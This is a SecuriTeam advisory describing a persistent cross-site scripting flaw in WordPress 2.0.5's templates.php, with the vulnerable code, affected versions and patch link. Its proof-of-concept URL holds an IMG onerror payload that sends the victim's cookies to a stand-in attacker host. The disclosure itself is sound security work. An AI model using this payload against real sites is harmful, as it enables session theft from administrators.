SecuriTeam - WordPress Persistent XSS (templates.php)

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

Ask the Team
Mailing Lists
Advertising Info
Advisories
About SecuriTeam
Blogs

Brought to you by:

Suppliers of:

SecuriTeam in Your Inbox

New vulnerability?
New tool?
Tell us
(Our PGP key).

CanSecWest 2012

2nd Annual Cyber Security

Hack In Paris

WordPress is "a state-of-the-art semantic personal publishing platform with a focus on aesthetics, web standards, and usability". A vulnerability in WordPress's templates.php allows a user with access to the templates.php to insert arbitrary HTML and/or Javascript which can be then executed by other administrators.

Credit:
The information has been provided by David Kierznowski.
The original article can be found at: http://michaeldaw.org/md-hacks/wordpress-persistent-xss/

Website Security Scan	Code Vulnerability Test	Network Assessment Tool
Detect hidden vulnerabilities	Exhaustive automated testing	Real-time, continuous security
Get guidance from professionals	of internal or 3rd party code.	scanning for your entire network

Protect your website!
Use an External Vulnerability Scanner!
Nothing to install. First report in 1 hour!
www.beyondsecurity.com/vulnerability-scanner

Vulnerable Systems:
* WordPress version 2.0.5 and prior

Immune Systems:
* WordPress version 2.0.6

When editing files a shortcut is created titled recently accessed files . The anchor tag text is correctly escaped with wp_specialchars(); however, the link title is not sanitized. Instead, it is passed to get_file_description($file). The only restriction or limitation here is that our text is passed through basename. This means standard script tags will fail when ending with / . We can get around this by using open IMG tags; this works under FF and IE.

Vulnerable code in wp-admin/templates.php:

[line 22]$recents = get_option('recently_edited');
[line 72]update_recently_edited($file);
[Line 116]:foreach ($recents as $recent) :
        echo "<li><a href='templates.php?file="
          . wp_specialchars($recent, true) . "'>"
          . get_file_description(basename($recent))
          . "</a></li>";

Vulnerable function:

function get_file_description($file) {
        global $wp_file_descriptions;

        if (isset ($wp_file_descriptions[basename($file)])) {
                return $wp_file_descriptions[basename($file)];
        }
        elseif (file_exists(ABSPATH.$file)) {
                $template_data = implode('', file(ABSPATH.$file));
                if (preg_match("|Template Name:(.*)|i",
                   $template_data, $name))
                        return $name[1];
        }
        return basename($file);
}

Proof of concept:
https://blogsite/wp/wp-admin/templates.php?file=<img src=""
          onerror=javascript:document.location.href=
          'http://evilhacker/capturecookie.php?'+document.cookie;>

Solution:
WordPress has fixed this for v2.0.6 and a patch has been released for v2.0.5, see: http://trac.wordpress.org/changeset/4665

blog comments powered by Disqus

	ProFTPD Response Pool Use-After-Free Code Execution Vulnerability
	Insight Control for Linux Multiple Vulnerabilities
	HP-UX Running NFS/ONCplus Denial of Service Vulnerability
	HP-UX Running BIND Denial of Service Vulnerability 2011
	HP-UX Running XNTP Denial of Service Vulnerability
	HP-UX Denial of Service Vulnerability
	Webkit Detached Body Element Code Execution Vulnerability
	Mac OS X Compact Font Format Decoder Code Execution Vulnerability
	WebKit WBR Tag Removal Code Execution Vulnerability
	Webkit Undefined DOM Prototype Attach Code Execution Vulnerability
	Apple HFS Information Disclosure Vulnerability
	XPDF arbitrary Arbitrary Code Execution Vulnerabilities
	Hewlett-Packard Data Protector Client EXEC_CMD omni_chk_ds.sh Code Execution Vulnerability
	Red Hat OpenJDK IcedTea6 ClassLoader Code Execution Vulnerability
	HP-UX Apache Running Tomcat Servlet Engine Remote Modification and Denial of Service Vulnerabilities